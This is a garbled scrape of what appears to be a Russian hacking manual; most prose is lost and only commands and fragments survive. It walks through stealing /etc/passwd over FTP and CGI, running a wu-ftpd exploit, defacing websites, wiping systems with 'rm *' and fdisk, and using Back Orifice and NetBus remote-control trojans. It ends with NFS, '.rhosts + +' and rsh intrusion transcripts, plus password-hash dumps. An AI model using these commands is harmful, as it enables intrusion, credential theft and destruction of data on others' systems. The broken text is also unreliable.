Levin M. Haking 1
Transcript of Levin M. Haking 1
-
8/7/2019 Levin M. Haking 1
1/112
:
681.3 32.973.26018.2
363
., 2006
,2006
.363 :
. .: , 2006. 224 .
.
681.3 32.973.26018.2
2006
, .
, , , .
,
(, TCP/IP). .
?
!
.
:
Linux
RedHat
UNIX SlackWare
UNIX
FreeBSD , UNIX
: Linux BSD (FreeBSD,OpenBSD, NetBSD)? .
.
, :
ftp 21
telnet 23
smtp 25
http 80
pop3 110
.
, :
FTP (21)
, FTP, , .
FTP? File Transfer Protocol( ). , FTP , 21 , , .
TELNET (23)
, ( ), .
telnet ? , (!) ( !) .
SMTP (25)
, ,
? ,
. Simple Mail Transfer Protocol .
HTTP (80)
Hyper Text Transfer Protocol .
, , , Internet.
web, ( ) . , .
, ! , web .
POP3 (110)
MailAgent (, Microsoft Outlook).
() .
? ,
UNIX . ( ) UNIX.
Windows (MUST_DIE), (A, B, C,D) :
C:\MUST_DIE\die.com
UNIX /, ( CDROM) (,/cdrom).
. .
.
/etc. () /etc passwd .. /etc/passwd.
, , ,
, .
, !
, IP.
:tracert ( UNIX traceroute)
w3.cnn.com
( ) IP
(IP Internet. 195.55.55.55 ( 0255 .. 0255.0255.0255.0255).
ftp (
IP). ? MSDOS PROMPT MSDOS.
( ) login. Internet.
Password.
Internet.
( , , ! w3.dos.net IIS
(Internet Information Server), !
.
:
Directory /home/usr/_ not
foundLogging in "/"
, , .
:
ftp> ( ) get /etc/passwd
.? . , find MUST_DIE passwd (). ,
ftp (.. MUST_DIE). , find.
, . , , , !
,
! :
, .
?
IP . , , . , .
: ? ,
Internet. TCP/IP (Transfer ControlProtocol/Internet Protocol) ,
Internet. .
Internet, IP (, ppp10335.dialup.glasnet.ru). ( ) , . ,
, IP:port ( , 195.34.34.30:21 , FTP zone.ru).
, ,
23 ( telnet) ( telnet ip:port. , 23). , .
/, . ,
, , .
23 , ,
. .
( ). 273275 , , , ,
:
, Internet. , . . , .
( 19).
, , .
, .
(Finger).
finger , , , .
,
? 1 1024 (wellknown). , services. Windows
C:\_Windows\SERVICES\. NT C:\WINNT\SYSTEM32\DRIVERS\ETC\SERVICES. /etc/services/
( , ). , (WWW, mail,FTP, news, telnet). , SMTP
25 ,POP3 110 , WWW 80 , FTP 21
, ,
. ! , ( ) , .
, , , ( ,
Internet !).
.
.
, ?
, . . ,
sendmail ( wiz debug FTP, ).
, , .
Windows
.
, Internet. , .
. , , . . , ++,
(root) , !!! FTPBounce , , FTP( / / ) ,
. ( ). ,
FTP ,
. ( ). ,
( !).
, ( !), . ,
: NT, VMS UNIX. UNIX BSD, AIX, SCI, Sun OS, Irix () .
, , NT, UNIX, Sun OS (, ).
,
, , .
. , ?
,
netstat a ( ) :
Active Connections
Proto  Local Address        Foreign Address   State
TCP    localhost:1027       0.0.0.0:0         LISTENING
TCP    localhost:135        0.0.0.0:0         LISTENING
TCP    localhost:135        0.0.0.0:0         LISTENING
TCP    localhost:1026       0.0.0.0:0         LISTENING
TCP    localhost:1026       localhost:1027    ESTABLISHED
TCP    localhost:1027       localhost:1026    ESTABLISHED
TCP    localhost:137        0.0.0.0:0         LISTENING
TCP    localhost:138        0.0.0.0:0         LISTENING
TCP    localhost:nbsession  0.0.0.0:0         LISTENING
UDP    localhost:135        *:*
UDP    localhost:nbname     *:*
UDP    localhost:nbdatagram *:*
. , .
, Local Address () 135, 137, 138 nbsession ( 139 netstatan, , .
MicrosoftNetworking LAN ( ). Internet , www.uxx.com, , www.happyhacker.org. ( www.whitehouse.gov). netstat a :
Active Connections
Proto  Local Address    Foreign Address        State
TCP    localhost:1027   0.0.0.0:0              LISTENING
TCP    localhost:135    0.0.0.0:0              LISTENING
TCP    localhost:135    0.0.0.0:0              LISTENING
TCP    localhost:2508   0.0.0.0:0              LISTENING
TCP    localhost:2509   0.0.0.0:0              LISTENING
TCP    localhost:2510   0.0.0.0:0              LISTENING
TCP    localhost:2511   0.0.0.0:0              LISTENING
TCP    localhost:2514   0.0.0.0:0              LISTENING
TCP    localhost:1026   0.0.0.0:0              LISTENING
TCP    localhost:1026   localhost:1027         ESTABLISHED
TCP    localhost:1027   localhost:1026         ESTABLISHED
TCP    localhost:137    0.0.0.0:0              LISTENING
TCP    localhost:138    0.0.0.0:0              LISTENING
TCP    localhost:139    0.0.0.0:0              LISTENING
TCP    localhost:2508   zlliks.505.ORG:80      ESTABLISHED
TCP    localhost:2509   zlliks.505.ORG:80      ESTABLISHED
TCP    localhost:2510   zlliks.505.ORG:80      ESTABLISHED
TCP    localhost:2511   zlliks.505.ORG:80      ESTABLISHED
TCP    localhost:2514   whitehouse.gov:telnet  ESTABLISHED
, . , , 4 zllinks.505.ORG 80 whitehouse.gov . , Internet.
www.happyhacker.org (zlliks.505.ORG). , 1024??? , , , . ,
,
1024 . ? , 2508 2511.
? Internet () netstat r. :
Route Table
Active Routes:
Network Address   Netmask           Gateway Address   Interface         Metric
0.0.0.0           0.0.0.0           198.59.999.200    198.59.999.200    1
127.0.0.0         255.0.0.0         127.0.0.1         127.0.0.1         1
198.59.999.0      255.255.255.0     198.59.999.200    198.59.999.200    1
198.59.999.200    255.255.255.255   127.0.0.1         127.0.0.1         1
198.59.999.255    255.255.255.255   198.59.999.200    198.59.999.200    1
224.0.0.0         224.0.0.0         198.59.999.200    198.59.999.200    1
255.255.255.255   255.255.255.255   198.59.999.200    0.0.0.0           1
Active Connections
Proto  Local Address     Foreign Address       State
TCP    lovelylady:1093   mack.foo66.com:smtp   ESTABLISHED
Gateway Address Interface IP ( IP , ). ,
, 10 , , , ( ) , ( ).
, Internet . p: . ? . .
e
mail UUPC . online
offline . init init1 \UUPC. login password. . Ho ,
.
usera , login:.
.
, Netscape, SLIP & PPP, ,
y , . , . transmit . , , Windows.
, :
.pwl. Windows . . , DES. Ho . ,
.pwl , 1,2,3,4 , , .
,
. , . . . ,
. BBS, . ! Ha 100%. login, password. , .
,
. yp ( )
. .
login/passwd,
. root . Ho . , , .
UNIX:FreeBSD, BSDI, SCO open server, Linux., , NexStep, UnixWare, Solaris,Aix, HPUX, VAXORX5.12. , Xenix. Ho
, , AT&T UNIX 1971 . UNIX:
(daemon) .
exploit:
ftp wuftp2.42; wuftp2.60 qpopper proftp . exploit
openSource ( ), ++.
UNIX. exploit ( ) UNIX wuftp2.42 ( root):
#gcc .
#./a.out
( )
IP , offset , ,
() (
5000 +5000 +100, .. : 5000 4900
4800 0 100 200 5000).
, . , ,
(patch) , (bugs) .
, .
root?Root
. Root , root (superuser), , !
root? root (, , , ).
? exploit. ,
exploit. ? , C++, , , .
() exploit remote access ( ), ..
exploit ( , ) remoteaccess.
?
, ( ), ?
1. (,).
2. .
3. , .
, . : /etc (
), ftpusers ( BSDI UNIX), default () root 21
(ftp) . joe ( ) root ftp.
? root #, (Ctrl+k,
x).
( root):
#joe /etc/ftpusers
root #, Ctrl+k, x.
, , ( ?).
, root , root
, ( ) , !
:
#ftp ip_address or host_name
login: root
password: !
!
root ! ( , )
? ! exploit!
:
login incorrect
1 1.000.000 ( ), , () .
exploit( , root). :
#passwd
:
New unix passwd:
( ) 12345
:
Unix password too weak, please
retype password:
?
, UNIX MUST_DIE!
: Abc04k9834z
? !
, , ! ,
! , () ZRHEN.
12345 :
Retype password:
12345
, ! FTP.
#ftp
ftp>open ip_address or host_name
( ,
, )
login: root
password: 12345
! ( , ? WWW !)
ftp bye:
ftp>bye
.
ftp, ?
!
telnet ( 23), .
exploit
, :#telnet 127.0.0.1 80
127.0.0.1 loopback .. ip; 80 HTTP (Hyper
Text Transfer Protocol) , , :
we hack you
, ( , ?).
, , .. . , !
?
!
?
()
: , apache ( web). :
#which apache
:
/usr/sbin/apachectl
/usr/local/sbin/apachectl
, , , , DocumentRoot(httpd.conf). :
/usr/etc/apache
/usr/local/etc/apache
( ) apache DocumentRott(home_dir) :
/www
/home/www
/usr/local/www
:
#cd home_dir home_dir www. index.htm index.html. ?
:
#ls full | more
(www). :
#rm index.htm (index.html)
.
:
#joe index.htm (index.html)
( joe) :
This site hacked by Vasya
Ctrl+k, x.
joe .
! UNIX
, . , Internet:
Ftpd (ftp daemon) port 21 Telnetd (telnet daemon) port 23 Smtpd (smtp daemon) port 25 Httpd (http daemon) port 80 Pop3d (pop3 daemon) port 110
. ( roota) :
#killall httpd
web .
#killall ftpd
ftp .
, :
( roota):
#httpd start ( Linux)
#apachectl restart ( FreeBSD
web
apache)
ftpd:
#ftpd ( !)
. . , ( roota):
#cd /
#rm * ( (!)
)
#cd /boot
#rm *
#cd /bin
#rm *#cd /sbin
#rm *
#cd /usr/bin
#rm *
#cd /usr/sbin
#rm *
, ( /etc, ).
, .. rm
: /bin /sbin /usr/bin /usr/sbin ,
( rm ). :
#which rm
, rm. .
?
:
#cd /etc
#rm *
!
:
#reboot
( )
, 100%
? ( roota):
#fdisk
p ( . (, 4), :
d (enter), 4 (enter)
d (enter), 3 (enter)
d (enter), 2 (enter)
d (enter), 1 (enter)
w nter.
! !( !)
UNIX dd, ( )., . SlackWare:
:hda1 slack ; hda2 dos ; hdc2
slack
( , DOS, , MBR (Master Boot Record)
hdc2 (SlackWare). UNIX ? ! ):
dd /dev/hda /dev/hdc 0 512
:
512 . 512 ?Master Boot Record (MBR).
512 ( )
???
dd () hda hdc!
hdc!
, Ctrl+, dd. dd 20
8 , Internet 2
: dd fdisk.
, ( ).
99%
(), () ! (
() .
() ( portscanner):
#portscanner 55.55.55.55 1 1024
55.55.55.55 IP ; 1
;1024 .
( n ) ( ):
21
2225
80
110
:
Count.dat .
2. : (, ):
Count.cgi 755. ..#chmod 755 count.cgi
Count.cgi 777. ..#chmod 777 count.dat
telnet , ftp , ftp, chmod ftp.
count.cgi:
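#!/usr/bin/perl
# count.cgi: hit counter that keeps its value in count.dat
print "Content-type: text/html\n\n";
# read the current counter value
open (file,"count.dat");
@dat=<file>;
close (file);
$dat[0]++;
# write the incremented value back to count.dat
open (file,">count.dat");
print file "$dat[0]\n";
close (file);
# show the new value to the visitor
print " $dat[0]\n";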
count.dat ( 5).
! , count.cgi 1.
CGI
( ) .. CGI ! ( ,.. , ), : .
( , )
( email ). email :
cat /etc/passwd
cat /etc/master.passwd
cat /etc/shadow
(). , , .
:
Root:fdkjhgSFDgf:
( john the ripper) .:
.
, .
? , () () .
,
, , , .
, () , () .
? () .core.
? , , , , .
, realnetworks ( realaudio/realvideo). ,
UIN: Bugs, Crack
Social Ingineering
:
, 49 50
UIN ,
, . , .
: Internet
, . . C:\ . ICQ. UIN 20xxxx 80xxxxx. C:\Program Files\ICQ\UIN number.uin , , e
mail . , keyboard sniffer , .
ICQ Low, Medium High.
. ,
, ICQ. ( , ). UIN , , , reboot, ,
ICQ , keyboard sniffer . .
,
: , sniffer .
, ? ,
?
,
, UIN 51 52
http://www.icq.com/password/ ICQ
email .
UIN
email.
. , POP3Password Crack
. , . , hotmail.com , email , .
: ICQ 777777.
UIN! email, [email protected]. UIN , 2 . sometihg.com email , . , email
777777. ,
: email .
(: email , web ), web.
( email ) [email protected]. . , :
, . . , , . , 80% , ,
.
. UIN , email .
,
, ICQ 8 . Windows UIN .
Linux, , , password, ( ,
root ).
Linux ICQ , UIN
9, . ?
UINa. Linux ICQ , .
ICQ ,
: ICQ email?
: , ICQ
ICQhijeck. IP, UINa ICQhijeck spoofed , , .
.
, .
: , . ICQ?
: . , , ICQsniff , ICQ . , ,
, . , , , , , , , .
: ICQhijeck,ICQsniff, keyboard sniffer, TCP/UDP sniffer
, ?
:
Private Bug, . , , ICQ, .
tools ? , , . .
. ,
, , www.yahoo.com. .
,
, UIN ,
ICQ.
, , , ICQ
.
, ICQ , Windows. ,
www.icq.com ICQ, . , .
. web .
free emeil, freewebhosting . , email, .
, , , email
ICQ .
, , .
.
Internet , , ,
. ,
ICQ ,
. , ICQ ? ,
Internet
.
, Nuke 139, http://www.microsoft.com .
Internet , , Proxy , , http://www.gin.ru.
:http://www.teamcti.com/pview/PrcView.zip, ,
: RUN Windows 95/98
: regedit Windows(For Lamers). HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run. , , Internet ! , !
, sharin ssl
, cgi , .
()
(
) :
1.
, , C++, Visual C++, Delphi, , 16 32
( Windows95/98)
2. , . , . , , .
1
!!! !!! ? , , 2
, http://www.microsoft.com.
:
1. 1632 :
.
. . , !!! NeoLite,
:http://www.neoworx.com. .
2. , , , !!! ! 2 1!
Back
Orifice
BO 4
. , 4 .:
BoServ.exe
.
, . Windows
. (, PrcView) .exe. Bo. Windows\system\windll.dll,
Bo.
BoGui.exe
.
.
BoConfig.exe
, BoServ.exe .
, , ..
BoClient.exe
, BoGui.exe,
Target host:port
, BO. , , 31337.
:
Directory creat
().
Directory list
Directory remove
Export add sharing
Export delete
sharing
Export list
sharing
File copy
File delete
File find
File view
HTTP enable
HTTP
HTTP disable
HTTP
Key log begin
Key log end
MM capture avi
.avi
MM capture frame
frame
MM capture screen
Screen Shot c
MM list capture device
MM play sound
Net connections
Net delete
Net use
Net view
Ping host
Bo
Process kill
Process list
Process spawn
Reg
Windows System dialog box
System info
System lockup
System passwords
System reboot
.
!
NetBus
Net Bus
2 .patch.exe
. ,.. , .
Netbus.exe
.
Net Bus:
Host name/IP
Port
, 12345
Serevr admin
. , ..
Open CDROM
CDROM
Show image
Swap mouse
Start program
Msg manager
Screendump
Screen Shot
Get info
Play sound
Exit Windows
Send text
Active winds
Mouse pos
Listen
OnLine, Ctrl+Esc,Alt+ Tab ..
Sound system
Server setup
patch.exe
Control mouse
Go to URL
URL
Key manager
File manager
( )
,
Net Bus Users & Lamers. patch.exe . Back Orifice .
. . Internet
Back Orifice
Back Orifice Eliminator ,
BO!!! IP , BO Server,
Net Bus
Net Buster , Net Bus!!! IP , patch.exe (, , ),
c:\. 1000 .
IP ICQ?
icqs.exe. icqs.rar.
?
,
, , , , , ,,
, , , .
IP Internet . ,
, http://www.yandex.ru, .. ,, email ( Guest Book`s,, IP
). , IP, , , , , , , IP,
, IP,
, .. ( )
( ), Internet , . .
, Internet , ,
., , .
exploit, , , .
, , , ( ?), , , exploit
, , . , , .
.
. , , .
, !
? ! . . , , . Internet( ). !
etc/passwd
RU.HACKER RU.NETHACK
: etc/passwd? , ?
, , ,
, , . , , , , .
? , , , , . , ! ! ! http://kpnc.webprovider.com/hack.pl, etc/passwd , .
! ( demo Demo User
, ! ( , Netscape, ;
IE 4.0 (5.0) , , etc/passwd , , ,, , ).
:
DISPLAY ETC/PASSWORD FILE
LOGIN NAME DIR
root System Administrator /root
toor System Administrator /rootdaemon System Daemon /
sys Operating System /tmp
bin BSDI Software
/usr/bsdi
operator System Operator
/usr/opr
uucp UNIXtoUNIX Copy
/var/spool/uucppublic
games Games Pseudouser
/usr/games
news USENET News,,,
/var/news/etc
demo Demo User
/usr/demo
mail Sendmail
/var/spool/mail
brian Brian Atkins,,,
/export/home/brian
kannada Narendra Tumkur
/disk1/k/kannada
pumpkin2 liao xin
/disk1/p/pumpkin2
lost508 no idea/disk1/l/lost508
essepi Salvatore Calarco
/disk1/e/essepi
rajatbhasin Rajat Bhasin
/disk1/r/rajatbhasin
panze Congo Koa/disk1/p/panze
goni1 Naseer Bhatti
/disk1/g/goni1
madmama patty noland
/disk1/m/madmama
yccwp yang changchun
/disk1/y/yccwp
. , . .
, .
,
, , , , , , . , , ,
:LOGIN NAME DIR
demo Demo User /usr/demo
. ,
?
?
? , . , , , !
? ? , ,
(, )!
, ,
. nethackk1.htm ( HTML) :
etc/pasw ?
HTML, , , , hack.pl.
? html? , hack.pl. , . hack.pl ? , ,
?
, , ! ,
. , , madmama. ?
madmama.webprovider.com ?
Index of /
Name Last modified Size
Description
[DIR] Parent Directory 09Oct1999
11:10
[DIR] _private/ 09Oct1999 11:30
[TXT] form.html 09Oct1999 12:26 1k
[DIR] images/ 09Oct1999 11:30
[TXT] irc.html 09Oct1999 12:21 0k
[TXT] mamairc.html 09Oct1999 12:18
4k
[TXT] postinfo.html 09Oct1999 11:30
2k
[TXT] thank_you.html 09Oct1999
12:26 1k ! _private.
, ? . , !
, , !
, . madmama , !!!
? , dbf prices. ,
c. , . ! ,
!
, , ? , ? , ,
( ). . Etc/password , ( ) . ! Etc/password
!
etc/password ,
., ,
, .
, . ,
, :news USENET News,,, /var/news/etc
( , ,NetInfo), c , .
, , , . POP3 ( ), SMTP ( ).
, etc/password! ? ftp (, ).
ftp://ftp.werbprovider.com . , .
, WWW FTP
, UNIX
, . etc/password
( ) .
?
UNIX UNIX , UNIX, , ,
, .
Red Hat Black Cat , UNIX hobbiton.org ( , telnethobbiton.org 'newuser').
,
UNIX
, . , , , . , , !
, UNIX, . , , , UNIX,
. UNIX
Mortal Commander ( NortonCommander)
Windows. UNIX, . Mortal Commander .
LINUX bash
.
, , .
.
(, , TC, TENEX PDP10).
. ,
, . AT&T System V, .
, , GNU, bash Borne AgainShell.
,
CShell . , , .
, , , ( )., , .
cat /etc/shells, UWIN :
cat /etc/shells
/usr/bin/ksh
/usr/bin/sh
/usr/bin/tcsh
/usr/bin/csh
/bin/sh
/bin/ksh
/bin/csh
/bin/tcsh
,
(, ), .
exit. . (
/usr/bin /bin
, ).
$ echo $SHELL
/usr/bin/ksh
$ /usr/bin/sh
# echo $SHELL
/usr/bin/ksh
# exit
$ /usr/bin/tcsh
# echo $SHELL
/usr/bin/ksh
# exit
$ /usr/bin/csh
%echo $SHELL
/usr/bin/ksh
%exit
command.com (MSDOS) dir, UNIX
.
, . UNIX ls, /bin. , CYGWIN
, fileutils.tar.gz .
,
ls /.
ls /
A                    E      proc
base.bat             etc    reg
baseserviceslink.sh  F      sys
bin                  H      tmp
C                    home   usr
D                    lib    var
dev                  linka  win
, /etc , ls:
$ ls /etc , ,
crontab inetdconfig.sh passwd.add
traceit
in.ftpd init.exe priv.exe
tracer.exe
in.rlogind login.allow profile
ucs.exe
in.rshd login.deny rc ums.exe
in.telnetd mailx.rc services
inetd.conf mkpasswd.exe shells
inetd.exe passwd stop_uwin
? , ? ? ., , web. Java VisualBasic. , , ,
. , .
, HTML. HTML
. HTML ., , , Java . . .
? ,
. ..
, , ,
( ) . , , . ,
, (, , ).
, .
CGI BIN
, ?
CGIBIN. , . exe BackOrifice2000., . ,
, PentiumPro Windows NT, .
, . DEC Alpha UNIX.
, ? . , .
NT. Perl , UNIX, NT. , , . , .
? PL!, Perl. , ! , Perl! , .
! .
, .
(, www.agava.ru). ?
, , . !
! , , , , , .
, www cgibin
, !
VirtualAve
20
, , , !
, , , !
,
CGI CGI , , .
. ?
, , Internet ! , , ! , CGI+Free+Perl , .
, , , .
20 . cgibin,
Perl. sendmail,
( ).
,
http://yourname.virtualave.net/. FTP,
(, ftp://server26.virtual.ave). .
. ., . , . , .
Hypermart
10 ( ), , Perl .
,
Webjump
25
.
, http://yourname.hypermart.net/., , http://server26.hypermart.net/ kpnc .
FTP, , , .
, , email. email , . , , ZMAIL.RU TELEMEDNET.RU. , .
25 CGIBIN, () , Perl , .
, , , ( ) !
ProHosting
,
. . .
JustFree
cgibin . ,
, , .
!
, FTP WWW
, ,
. , . , , , ,
!
., , FTP. FTP,
. , FAR.
FTP.
, ( , ).
FTP WWW, !
. Enter . , , , . !
, , , Norton Commander, , .
? , /CGIBIN, ! ! . , . HyperMart , Virualave /public_html. , . Perl. , .
/var/news/etc
demo Demo User
nonroot Nonroot root user for
NFS/nonexistent
demo Demo User
/usr/demo
mail Sendmail
/var/spool/mail
brian Brian Atkins,,,
/export/home/brian
alias ,,,
/var/qmail/alias
qmaild ,,,
/var/qmailqmaill ,,,
/var/qmail
qmailp ,,,
/var/qmail
qmailq ,,,
/var/qmail
qmailr ,,,
/var/qmail
qmails ,,,
/var/qmail
ftp FTP Daemon,,,
/var/spool/ftp
proftp FTP Daemon,,,/var/spool/ftp
www Publish Account,,,
/usr/home/www
nobody Unprivileged user
/nonexistent
NFS/nonexistent
hmvbin 6553666559 reserved for
hmv/nonexistent
! !(, demo). , ? , ,, , .
, , , .
1
. , .
! !
2
, , , , .
( ) ! ? ,
3
? , .
, , . , , ( ), , ( web , ).
|mail [email protected]
href=http://kpnc.id.ru>PRO
HACK
";print "DISPLAY ETC/PASSWD FILE \n";print "";
print "";
print " LOGIN";
print " NAME";
print " DIR";
open(PASS, "
EP/IX
/etc/shadow
HPUX
/.secure/etc/passwd
IRIX 5
/etc/shadow
Linux 1.1
/etc/shadowOSF/1
/etc/passwd[.dir|.pag]
SCO Unix #.2.x
/tcb/auth/files//
SunOS4.1+c2
/etc/security/passwd.adjunct
SunOS 5.0
/etc/shadow
System V Release 4.0/etc/shadow
System V Release 4.2
/etc/security/
databaseUltrix 4
/etc/auth[.dir|.pag]
? .
open(PASS, "
. ( )., , ,
. . .
? , : finger, rusers,showmount, rpcinfo, dns, ftp, sendmail .
. ?
allias, nameserver , . nslookup.
# g @
[www.xxx.xxxx.su]
Login NameTTY Idle When
Office
kuzmenko Vladimir Kizmenko p0
4:57 Sun 08:25
kuzmenko Vladimir Kizmenko p1
2:38 Sun 08:26
milichen Yuri Mulichenko p44:59 Fri 19:41 3B/r410 13513
sherbak Eugeny Scherbkov p5
5:00 Sat 10:18 221/r448 17733
devil# finger [email protected]
[ccsix.xxxx.xxxx.ru]Login: yur
Name: Yuri A. Podgorodsky
Directory: /home/yur
Shell: /bin/bash
On since Sat Apr 12 12:24 (MSK) on
ttyp0 from jannet.xxxx.xxxx3 hours 35 minutes idle
Mail forwarded to
No mail.
No Plan.
devil# rusers l unisun.xxxxxxxx.net
Login Name
TTY When Idle
unknown
100000 2 udp
0 0 0 0 0
Host
lavrov unisun.xxxxx
xxx:console Apr 2 10:32 17:37suh unisun.xxxxx
xxx:ttyp0 Apr 5 10:20
17:32 (mskws.desy.de)
lavrov unisun.xxxxx
xxx:ttyp1 Apr 2 11:21
25:55 (:0.0)lavrov unisun.xxxxx
xxx:ttyp2 Apr 2 10:33
97:11 (:0.0)
,
, shell , . Idle, , .
2. rpcinfodevil# rpcinfo sun10.xxx.xxx.su
program version netid address
service owner
100000 2 tcp
0.0.0.0.0.111 rpcbind
0.0.0.0.0.111 rpcbind
unknown
100004 2 udp0.0.0.0.2.150 ypserv
unknown
100004 2 tcp
0.0.0.0.2.151 ypserv
unknown
100004 1 udp0.0.0.0.2.150 ypserv
unknown
100004 1 tcp
0.0.0.0.2.151 ypserv
unknown
100069 1 udp
0.0.0.0.2.152
unknown
100069 1 tcp
0.0.0.0.2.154
unknown
100007 2 tcp
0.0.0.0.4.0 ypbindunknown
100007 2 udp
0.0.0.0.4.3 ypbind
unknown
100007 1 tcp
0.0.0.0.4.0 ypbind
unknown
100007 1 d
100005 2 tcp
0.0.0.0.2.226 mountd
k
100007 1 udp
0.0.0.0.4.3 ypbind
unknown100028 1 tcp
0.0.0.0.2.156 ypupdated
unknown
100028 1 udp
0.0.0.0.2.158 ypupdated
unknown100009 1 udp
0.0.0.0.3.255 yppasswdd
unknown
100029 1 udp
0.0.0.0.2.159 keyserv
unknown
100003 2 udp0.0.0.0.8.1 nfs
unknown
100005 1 udp
0.0.0.0.2.223 mountd
unknown
100005 2 udp0.0.0.0.2.223 mountd
unknown
100005 1 tcp
0.0.0.0.2.226 mountd
unknown
unknown
100024 1 udp
0.0.0.0.2.226 statusunknown
100024 1 tcp
0.0.0.0.2.228 status
unknown
100021 1 tcp
0.0.0.0.2.229 nlockmgrunknown
rpcinfo RPC . mountd, nisd, ypserv ypbind, statd, bootparam, pcnfsd, rexd. statd .pcnfsd mountd , rexd .
3. NIS (nisd, ypbind, ypserv).
NIS
, NIS NIS rpc . :
devil# ypx dg sun10.xxx.xxx.su
Trying domain sun10.xxx.xxx.su
Trying domain sun10
Trying domain xxx xxx su
YP map transfer successfull.
Trying domain xxx.xxx.su
sysdiag:*:0:1:Old System
Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
sundiag:*:0:1:System
Diagnostic:/usr/diag/sundiag:/usr/diag
/
sundiag/sundiag
sybase:*:13:55:syb:/usr/nms/sybase:/bin/csh
nobody:*:65534:65534::/:
daemon:*:1:1::/:
audit:*:9:9::/etc/security/audit:/bin/
csh
uucp:*:4:8::/var/spool/uucppublic:
sync:__F324VMRDcL6:1:1::/:/bin/syncroot:__Ye.Ibw.8uQg:0:3:Operator:/:/bin
/csh
news:*:6:6::/var/spool/news:/bin/csh
sys:*:2:2::/:/bin/csh
snm:__7ck.pfEh/2s:11:11:Network
Manager:/usr/snm:/bin/cshrom:__IriAsoksSeE:10:10:Victor
Romanchik:/usr/rom:/bin/csh
nms:*:12:55:Network
Manager:/usr/nms:/bin/csh
bin:*:3:3::/bin:
__ .
NIS , bootparam /var/yp, .
4. showmountdevil# showmount e
thsun1.xxxx.xxxxx.su
export list for thsun1.xxxx.xxxxx.su:
/pub
(everyone)
/optthsun2,thsun3,tlx39
/pgm/linux
(everyone)
/export
(everyone)
/usr
(everyone)/tftpboot
(everyone)
/cdrom/sol_2_3_hw894_sparc/s0
(everyone)
/home
(everyone)
/scratch/users
(everyone)
512 Feb 14 11:16 lnp
drwxrxrx 6 root other
512 Feb 14 11:19 lnup
(everyone)
showmount , , . export, home, usr !
devil# mount F nfs
thsun1.xxxx.xxxxx.su:/home /mntdevil# cd /mnt
devil# ls al
total 12524
drwxrxrx 17 root root
1024 Jun 28 1996 .
drwxrxrx 28 root root1024 Apr 12 16:29 ..
drwxrxrx 2 root root
512 May 19 1995 TT_DB
drwxrxrx 3 root 798
512 Nov 25 1994 cfi
drwxrxrx 6 root 100
512 Nov 25 1994 dugdrwxrxrx 9 root other
512 Feb 17 11:19 lcta
drwxrxrx 3 root other
512 Jun 19 1996 lhep
drwxrxrx 6 root other
512 Feb 14 11:19 lnup
drwxrxrx 4 root other
512 Jan 15 1995 lnurdevil# cd lnup
devil# ls al
total 12
drwxrxrx 6 root other
512 Feb 14 11:19 .
drwxrxrx 17 root root1024 Jun 28 1996 ..
drwxrxrx 3 6000 600
512 Oct 30 1995 dolbilov
drwxrxrx 9 6190 600
1024 Oct 7 1996 davgun
drwxrxrx 4 6001 600
512 Oct 20 1995 gvfdrwxrxrx 4 6003 600
512 Apr 4 10:31 yup
devil# echo 'dolbilov::600:' >>
/etc/groups
devil# echo
'dolbilov:x:6000:600::/noway:/bin/csh'>> /etc/passwd
devil# su dolbilov
$ cd dolbilov
$ ls al
total 30
drwxrxrx 3 dolbilov dolbilov
512 Apr 12 16:21 .
drwxrxrx 6 root other
220 www.xxx.ru ESMTP Sendmail
8.8.5/8.8.5; Sat, 12 Apr 1997
15:55:36 +0400
drwxr xr x 6 root other
512 Feb 14 11:19 ..
rwrr 1 dolbilov dolbilov2901 Apr 7 1993 .cshrc
rwrr 1 dolbilov dolbilov
1550 Apr 7 1993 .login
rwrr 1 dolbilov dolbilov
2750 Apr 7 1993 .rootmenu
rwrr 1 dolbilov dolbilov478 Apr 7 1993 .sunview
rw 1 dolbilov dolbilov
2196 Oct 30 1995 mbox
drwxrxrx 2 dolbilov dolbilov
512 Nov 25 1994 timezone
$ echo '+ +' > .rhosts
$ exitdevil# rsh l dolbilov
thsun1.xxxx.xxxxx.su /bin/csh i
$
shell .
5. sendmail
devil# telnet www.xxx.ru 25
Trying 193.124.xxx.xx
Connected to www.xxx.ru.
Escape character is '^]'.
15:55:36 +0400
vrfy serg
550 serg User unknownvrfy alex
250 Alexei E. Katov get
/tmp/../../../../../../../../../etc/pa
sswd /tmp/passwd
tftp> quit
devil#
7. ftp
Login failed.
ftp> quote pasv
421 Service not available, remote
ftp
, . . .
devil# ftp xxxxxxxxxxx.xxx.com
Connected to xxxxxxxxxxx.xxx.com.
220 xxxxxxxxxxx FTP server (UNIX(r)
System V Release 4.0) ready.
Name (xxxxxxxxxxx.xxx.com:root): ftp
331 Guest login ok, send ident as
password.Password:
230 Guest login ok, access
restrictions apply.
ftp> user root
530 User root unknown.
Login failed.ftp> user root
530 User root unknown.
Login failed.
ftp> user foobar
530 User foobar access denied.
421 Service not available, remote
server has closed connection
ftp> o xxxxxxxxxxx.xxx.comConnected to xxxxxxxxxxx.xxx.com.
220 xxxxxxxxxxx FTP server (UNIX(r)
System V Release 4.0) ready.
Name (xxxxxxxxxxx.xxx.com:root): ftp
331 Guest login ok, send ident as
password.Password:
230 Guest login ok, access
restrictions apply.
ftp> bin
200 Type set to I.
ftp> get core
200 PORT command successful.150 Binary data connection for core
(194...,51553)
(281136 bytes).
226 Binary Transfer complete.
local: core remote: core
281136 bytes received in 16 seconds(17 Kbytes/s)
ftp> bye
221 Goodbye.
devil#
/********** Fragment of core
************/
.994:..S.:.
srk: a2U/fw.FWhk:.::::..S
:
__ /
harat:__mQb7Pij8mrA:.::::..S@
kchu:__/sPKnswJ8y2:9.::::..S`yhew:__0/L6foNhPoA:9.:::: ..S.
:h6qh9see7ry .M:9353:.:.
pa ..S.WGZ/NEzsLjwe 2:9097::..
flo ..S.Xbra.0mg/PMc :9097:::.
dave ..S.0VnE0zICamE: 9097::::.
on:2 ..T.VqQO2BOU:909 7::::::..:/*************************************
***/
__.
7. rexd
devil# su daemon$ on i faxnetxx.xxx.ru /bin/sh i
$ uname a
faxnetxx faxnetxx 3.2 2 i386
$ id
uid=1(daemon) gid=1(other)
$8. .
rpc. .
X server
X 6000+ . magiccookies xhost +, ,
, (xspy, xpush). 6000 , denial_of_service .
rlogin talkd
, . rlogin TERM, talkd , . , . root.
rsh rexec
rsh rexec
, , NFS .
log. ,
root (/etc/default/login).
devil# rsh l smtp xxxx.xxx.ru
/bin/csh i
Warning: no access to tty; thus no
job control in this shell
# iduid=0(root) gid=0(root)
devil# nc v xxxx.xxx.ru 512
xxxx.xxx.ru [194.85.xxx.xxx] 512
